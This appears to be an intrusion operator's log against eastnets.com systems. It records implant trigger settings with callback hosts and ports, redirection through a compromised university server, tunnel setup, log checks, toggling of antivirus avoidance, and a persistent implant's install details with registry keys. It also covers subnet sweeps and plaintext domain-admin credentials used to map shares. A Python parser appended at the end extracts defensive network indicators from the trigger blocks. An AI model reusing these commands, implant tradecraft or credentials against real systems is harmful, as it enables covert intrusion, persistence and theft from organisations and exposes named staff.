ISP: LK
City:
Phone:
ISP IP: 65.218.69.150
Source IP:
FINAL target IP:
Ops Machine: LOCALHOST.LOCALDOMAIN
Redirecting Method 1: INCISION
Redirect Host 1: 192.168.1.3
Redirect Target 1: 10.10.10.180
BEGIN UNIX OPNOTES:
Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
---> 202.145.16.4 sunblade.kouku-dai.ac.jp pitchimpair unix successful
---> 192.168.1.3 endxbmail001.eastnets.com jeepflea_market windows successful
----> 10.10.10.180 store.eastnets.com jeepflea_market windows successful
---> 10.10.10.90 endzr-ard.eastnets.com jeepflea_market windows successful
Ops Machine: WO
Results:
PROJECT=JEEPFLEA_MARKET
OPUSER=57728
OPSCHEDULE=12110110015132
SCRUBVER=6.006000035
======================= P0
--- 202.145.16.4 --- sunblade
=======================
2012-11-07 05:15:23 UTC ourtn -wBIN -eY5U /current/up/noserver 202.145.16.4
2012-11-07 05:15:38 UTC on target
2012-11-07 05:16:00 UTC Uptime: 37 day(s), 5:45:14
2012-11-07 05:17:04 UTC logs are clean
2012-11-07 05:17:28 UTC setting up tunnels
-rawsend 444
-tunnel
r 443 192.168.254.72
r 31219 192.168.254.72
2012-11-07 10:11:55 UTC tunnels down
2012-11-07 10:12:45 UTC logs clean
2012-11-07 10:13:12 UTC off target
LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000035 20121107-0505
###################
SCRUBHANDS v6.006000035 (suite v6.6.0.35 run in /192.168.254.71) command line:
/usr/local/bin/scrubhands -t -S 12110110015132 -I 57728 -P JEEPFLEA_MARKET -n 198.6.1.3 65.218.69.150/224/129
###################
Final lines of bwmonitor.txt:
Wed Nov 7 10:13:19 UTC 2012
RX packets:50189 errors:0 dropped:0 overruns:0 frame:0
RX bytes:39381614 (37.5 MiB) TX bytes:8780195 (8.3 MiB)
###################################################
Project: JEEPFLEA_MARKET
Date: 5:13 AM 11/7/2012
### Lines to assist in automated processing
# Un-comment the "Op Status" line (the line immediately below this one) to mark this op as unsuccessful
#Op Status: Unsuccessful
# Un-comment the "Non-Standard" line (the line immediately below this one) to mark this op as a non-standard
#Non-Standard: True
###################################################
Targets:
Results:
======================= T1
--- 192.168.1.3 --- endxbmail001
=======================
Trigger: SUCCESSFUL - please update IN NEXT OPPLAN
----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
Target Address : 213.132.40.101
Source Address : 202.145.16.4
Target Protocol : TCP
Target Dst Port : 110
Target Src Port : 3054
TCP Flags : 0x02
Keyfile : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
Callback Address : 202.145.16.4
Callback Dst Port : 443
Callback Src Port : 0
Redirect through : 192.168.254.71:444
Final Destination : 192.168.1.3
Id : 0x0000000100011bd2
Packet Trailer : 0x4a11
----====**** CORDIALFLIMSY TRIGGER END ****====----
5:21 AM 11/7/2012 trigger sent - no callback
5:28 AM 11/7/2012 retriggered with no CB source port - nope
5:32 AM 11/7/2012 retrigger with the updated PCID
5:35 AM 11/7/2012 CALLBACK RECV
5:35 AM 11/7/2012 WIN2K3 SP 2
5:36 AM 11/7/2012 PSP installed - Kaspersky Endpoint Security 8 for Windows
| Kaspersky Endpoint Security 8 for Windows | 8.1.0.831 | Kaspersky Lab | 2012-08-06 |
| Kaspersky Security Center Network Agent | 9.2.69 | Kaspersky Lab | |
5:38 AM 11/7/2012 Uptime: 18 days, 13 hours, 30 minutes, 21 seconds
Idle : 0 days, 0 hours, 4 minutes, 54 seconds
5:39 AM 11/7/2012 Auditing:ON
AuditCategorySystem - Success Failure
AuditCategoryLogon -
AuditCategoryObjectAccess - Success Failure
AuditCategoryPrivilegeUse - Success Failure
AuditCategoryDetailedTracking -
AuditCategoryPolicyChange - Success Failure
AuditCategoryAccountManagement - Success Failure
AuditCategoryDirectoryServiceAccess - Success Failure
AuditCategoryAccountLogon - Success Failure
5:41 AM 11/7/2012 logs are clean
dir -mask * -path * -recursive -max 0 -age 15m
5:53 AM 11/7/2012 NO ZB because of PSP
5:54 AM 11/7/2012 Redirect to target 2
monitor packetredirect -listenport 444
imr 127.0.0.1 2143 2143
8:38 AM 11/7/2012 logs are clean
8:40 AM 11/7/2012 off target
======================= T2
--- 10.10.10.180 --- store
=======================
6:03 AM 11/7/2012 trigger sent - success
Client Version: 2.1.0 (Nov 7 2011 16:44:14)
----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
Target Address : 10.10.10.180
Source Address : 192.168.1.3
Target Protocol : ICMP
ICMP type,code : 8,0
Keyfile : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
Callback Address : 192.168.1.3
Callback Dst Port : 2143
Callback Src Port : 0
Redirect through : 127.0.0.1:444
Final Destination : 10.10.10.180
Id : 0x0000000100010a85
Packet Trailer : 0x61ae
----====**** CORDIALFLIMSY TRIGGER END ****====----
6:09 AM 11/7/2012 OS: Win2k3 SP2 32bit
6:09 AM 11/7/2012 PSP: Kaspersky Anti-Virus 8.0 for Windows - not comm with cloud
** has been updated
| Kaspersky Endpoint Security 8 for Windows | 8.1.0.831 | Kaspersky Lab | 2012-08-01 |
| Kaspersky Security Center Network Agent | 9.2.69 | Kaspersky Lab | |
** sad face
| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| THIS VERSION APPEARS TO BE UNSUPPORTED. PLEASE HARASS THOSE RESPONSIBLE.
| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
6:10 AM 11/7/2012 Uptime: 85 days, 1 hours, 39 minutes, 32 seconds
Idle : 0 days, 0 hours, 20 minutes, 4 seconds
6:12 AM 11/7/2012 Procs previously seen... not a threat
- | 2076 | 524 | C:\WINDOWS\system32 | mapsvc.exe | NT AUTHORITY\SYSTEM | 2012-06-14 | |
- | 2096 | 524 | C:\WINDOWS\system32 | nfssvc.exe | NT AUTHORITY\SYSTEM | 2012-06-14 | |
6:14 AM 11/7/2012 Auditing:ON - not dorked
6:22 AM 11/7/2012 conficker still on target
6:18 AM 11/7/2012 checking logs - we are clean
dir -mask * -path * -recursive -max 0 -age 15m
6:38 AM 11/7/2012 need to upgrade to FLAV w/KISU and SOLARTIME
1) install PC KISU w/ FLAV
PCID = 0x100011ee9
KISU = Installing pc (0x7a43e1fa)
Version: 2.2.0.5
Kernel Module Loader:
Registry Key: \registry\machine\SYSTEM\CurrentControlSet\Services\QDLTx32\Parameters
Registry Value: {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
User Module Loader:
Registry Key:
Registry Value:
Module Store Directory:
Registry Key: \registry\machine\SYSTEM\CurrentControlSet\Services\CipcCdp\Parameters
Registry Value: {3983D697-20B0-B301-BD80-38DFDA93C8D0}
Launcher:
Service Name: SMBios
Registry Value: {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
Persistence:
Method: SOTI
Module Id    Size     Order  Flags   Name                      Process
=====================================================================
0xbb397f32   62464    0      U EC    UserModuleLoader 32-Bit
0xbb397f34   20       0      ECL     Persistence Identifier
0xd0000102   171520   1      B D EC  ntevt
0xd0000100   87552    1      A U EC  true                      services.exe
B: BootStart, S: SystemStart, A: AutoStart, D: KernelDriver
U: UserMode, R: SystemMode, K: ServiceKey, E: Encrypted
C: Compressed, L: DemandLoad, O: AutoStart Once
7:14 AM 11/7/2012 flav install test ... WOW it worked.
7:21 AM 11/7/2012 we got knocked off the original connection... seems to be ok.
7:26 AM 11/7/2012 psp_avoidance -enable
- --------------------------------
- PSP Avoidance changes: SUCCEEDED
- --------------------------------
7:27 AM 11/7/2012 removing old PC and DMGZ - delete failed, needed to pfroadd
pfroadd c:\windows\System32\wship.dll
7:31 AM 11/7/2012 psp_avoidance -disabled
- --------------------------------
- PSP Avoidance changes: SUCCEEDED
- --------------------------------
7:35 AM 11/7/2012 Run a netmap to find targets of interest
** Want Sanam Mirchandi if possible, otherwise just an additional UR in the 10.10.10.X subnet
scansweep -type arp -target 10.10.10.1-10.10.10.254 -period 3s-7s
7:36 AM 11/7/2012 ** TARGETS UP **
Internet Address   State/Type   Physical Address     Interface
-----------------------------------------------------------------------------------
10.10.10.10        Dynamic      00-0C-29-45-41-EB    10.10.10.180
10.10.10.49        Dynamic      00-1D-BA-F7-EF-DE    10.10.10.180
10.10.10.52        Dynamic      00-16-EA-CA-CD-14    10.10.10.180
10.10.10.55        Dynamic      00-26-C6-38-98-30    10.10.10.180
10.10.10.56        Dynamic      00-22-FA-98-30-5C    10.10.10.180
10.10.10.60        Dynamic      00-1D-72-5D-B5-18    10.10.10.180
10.10.10.70        Dynamic      00-13-E8-CB-55-75    10.10.10.180
10.10.10.86        Dynamic      00-21-5D-46-D9-3C    10.10.10.180
10.10.10.94        Dynamic      E8-39-DF-1B-19-AA    10.10.10.180
10.10.10.95        Dynamic      00-16-EA-BB-A2-84    10.10.10.180
10.10.10.104       Dynamic      00-1E-65-B2-4C-EA    10.10.10.180
10.10.10.124       Dynamic      00-27-13-B3-CA-AA    10.10.10.180
10.10.10.134       Dynamic      5C-26-0A-5D-95-83    10.10.10.180
10.10.10.147       Dynamic      00-21-5D-45-CE-82    10.10.10.180
10.10.10.151       Dynamic      00-21-6A-7F-13-66    10.10.10.180
10.10.10.161       Dynamic      5C-26-0A-5D-96-14    10.10.10.180
10.10.10.230       Dynamic      00-1F-12-25-AB-05    10.10.10.180
7:37 AM 11/7/2012 scanning up 10.10.10.151 - ragarwal
NativeOS: Windows 7 Professional 7600
NativeLanMan: Windows 7 Professional 6.1
7:51 AM 11/7/2012 the old creds failed ....
dubai-admin dxbr00t
dubai-admin dxbr00t$$
ragarwal ashima2 - local
** trying creds updated on 10.10.10.151 - shares = nope
8:00 AM 11/7/2012 scanning 10.10.10.55 - dabbagh
NativeOS: Windows 7 Enterprise 7601 Service Pack 1
NativeLanMan: Windows 7 Enterprise 6.1
** trying creds on 10.10.10.55
creds tried: dubai-admin dxbr00t$$
dir \\10.10.10.55\c$\progra~1\Microsoft Forefront UAG\Endpoint Components\3.1.0\
Windows Defender
exploit? ** nope **
8:08 AM 11/7/2012 scanning up 10.10.10.70 - sanam
NativeOS: Windows 7 Ultimate N 7601 Service Pack 1
NativeLanMan: Windows 7 Ultimate N 6.1
shares -target 10.10.10.70 -map IPC$ -credentials dubai-admin dxbr00t$$ EASTNETS
dir \\10.10.10.70\c$\progra~1\
Kaspersky Anti-Virus 6.0 for Windows Workstations MP4
Windows Defender
exploit? **nope**
8:38 AM 11/7/2012 checking the logs... clean
8:39 AM 11/7/2012 off target
======================= T3
--- 10.10.10.90 --- ENDXB-ARD
=======================
9:16 AM 11/7/2012 callback recv
9:16 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
Idle : 1 days, 15 hours, 51 minutes, 38 seconds
9:17 AM 11/7/2012 PSP Kaspersky 6.0
| Kaspersky Anti-Virus 6.0 for Windows Workstations | 6.0.4.1212 | Kaspersky Lab
PRODUCT NAME: Kaspersky Anti-Virus 6.0 for Windows Workstations
VERSION: 6.0.4.1212
9:18 AM 11/7/2012 new proc - Adobe Acrobat
- | 748 | 820 | C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat | AcroBroker.exe | EASTNETS\ADesear | 2012-11-07 |
9:24 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
Idle : 1 days, 15 hours, 51 minutes, 38 seconds
9:27 AM 11/7/2012 did not dork auditing
9:41 AM 11/7/2012 Memory Load : 68%
9:45 AM 11/7/2012 firewall Status: Disabled
10:09 AM 11/7/2012 downloaded tasking (~20MB)
10:09 AM 11/7/2012 off target
####
# Lines to assist in techsums
# NOTEs and ERRORs will automatically generate a techsum
# You can also enclose any portion of your opnotes in a block to have that section be included in the
# techsum automatically. Like so:
#
# Bad things happened.
# Then more bad things happened.
# Then it _really_ got bad.
#
# Please keep the and on separate lines
# Um...also, those angle brackets (< and >) are actually there, unlike the formats below
####
###################################################
#
# Create lines like the following (without #) to create targetnotes files
# Targetnotes files are found in the directory as targetnotes.txt; you can also create them directly.
# They will be read to automate actions in future ops.
#
# General note to operators
#NOTE ():
#
# Do not run this command (it will cause problems on this box)
#DONOTRUN ():
#
# This command caused an error (bring it to the attention of the developer)
#ERROR ():
#
# This process runs all the time and is harmless
#IGNORE ():
#
# This process was identified
#ID: =
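Added example, not part of these opnotes or of any tool they name: a parser for the CORDIALFLIMSY trigger blocks recorded under T1 and T2 above. It extracts each BEGIN..END block, normalises the hex, port and ICMP fields, and reduces a block to the observables a defender on the target network could alert on: the trigger packet (source to target, protocol, port and flags or ICMP type/code) and the callback the implant is expected to make. The sample input is copied from the two blocks in the notes, including the stray END marker that precedes the T2 block; treating "Final Destination" as the implant host and "Callback Address" as the listening post is this example's reading of the field names, not something the notes state.

```python
"""Parser for the CORDIALFLIMSY trigger blocks recorded in these opnotes.

Added example, not part of the original notes or of any tool they name.
"Final Destination" is read here as the implant host and "Callback Address"
as the listening post; that is an assumption about the field names.
"""

BEGIN_MARK = "CORDIALFLIMSY TRIGGER BEGIN"
END_MARK = "CORDIALFLIMSY TRIGGER END"
HEX_FIELDS = {"Id", "Packet Trailer", "TCP Flags"}
INT_FIELDS = {"Target Dst Port", "Target Src Port",
              "Callback Dst Port", "Callback Src Port"}
# Standard TCP flag bits; the 0x02 logged above is a bare SYN.
TCP_FLAG_BITS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
                 (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]

# Copied from the T1 and T2 entries above, including the stray END marker
# and the Client Version line that sit between the two blocks in the notes.
SAMPLE = r"""----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
Target Address : 213.132.40.101
Source Address : 202.145.16.4
Target Protocol : TCP
Target Dst Port : 110
Target Src Port : 3054
TCP Flags : 0x02
Keyfile : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
Callback Address : 202.145.16.4
Callback Dst Port : 443
Callback Src Port : 0
Redirect through : 192.168.254.71:444
Final Destination : 192.168.1.3
Id : 0x0000000100011bd2
Packet Trailer : 0x4a11
----====**** CORDIALFLIMSY TRIGGER END ****====----
----====**** CORDIALFLIMSY TRIGGER END ****====----
Client Version: 2.1.0 (Nov 7 2011 16:44:14)
----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
Target Address : 10.10.10.180
Source Address : 192.168.1.3
Target Protocol : ICMP
ICMP type,code : 8,0
Keyfile : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
Callback Address : 192.168.1.3
Callback Dst Port : 2143
Callback Src Port : 0
Redirect through : 127.0.0.1:444
Final Destination : 10.10.10.180
Id : 0x0000000100010a85
Packet Trailer : 0x61ae
----====**** CORDIALFLIMSY TRIGGER END ****====----
"""


def extract_blocks(text):
    """Return the 'Key : Value' lines of each BEGIN..END block.
    An END with no open block is ignored; lines outside a block are skipped."""
    blocks, current = [], None
    for line in text.splitlines():
        if BEGIN_MARK in line:
            current = []
        elif END_MARK in line:
            if current is not None:
                blocks.append(current)
            current = None
        elif current is not None and ":" in line:
            current.append(line)
    return blocks


def parse_block(lines):
    """Split on the first colon only, so 'D:\\...' paths and 'host:port'
    values survive; convert hex, port and ICMP fields to integers."""
    fields = {}
    for line in lines:
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key in HEX_FIELDS:
            fields[key] = int(value, 16)
        elif key in INT_FIELDS:
            fields[key] = int(value)
        elif key == "ICMP type,code":
            fields["ICMP Type"], fields["ICMP Code"] = (int(v) for v in value.split(","))
        else:
            fields[key] = value
    return fields


def tcp_flag_names(flags):
    return [name for bit, name in TCP_FLAG_BITS if flags & bit]


def indicators(fields):
    """Network observables for one trigger: the knock packet and the callback."""
    proto = fields["Target Protocol"].upper()
    ind = {
        "implant_host": fields["Final Destination"],
        "knock_from": fields["Source Address"],
        "knock_to": fields["Target Address"],
        "knock_proto": proto,
        "callback_to": (fields["Callback Address"], fields["Callback Dst Port"]),
    }
    if proto == "TCP":
        ind["knock_dst_port"] = fields["Target Dst Port"]
        ind["knock_src_port"] = fields["Target Src Port"]
        ind["knock_flags"] = tcp_flag_names(fields["TCP Flags"])
    elif proto == "ICMP":
        ind["knock_icmp"] = (fields["ICMP Type"], fields["ICMP Code"])
    return ind


def summarize(text):
    return [indicators(parse_block(b)) for b in extract_blocks(text)]


if __name__ == "__main__":
    for ind in summarize(SAMPLE):
        print(ind)
```

Run stand-alone it prints one summary per block: for T1 a SYN from 202.145.16.4 to 213.132.40.101:110 with source port 3054 and a callback to 202.145.16.4:443; for T2 an ICMP echo request (8,0) from 192.168.1.3 to 10.10.10.180 and a callback to 192.168.1.3:2143. Splitting only on the first colon is what keeps the Keyfile path and the "Redirect through" host:port intact.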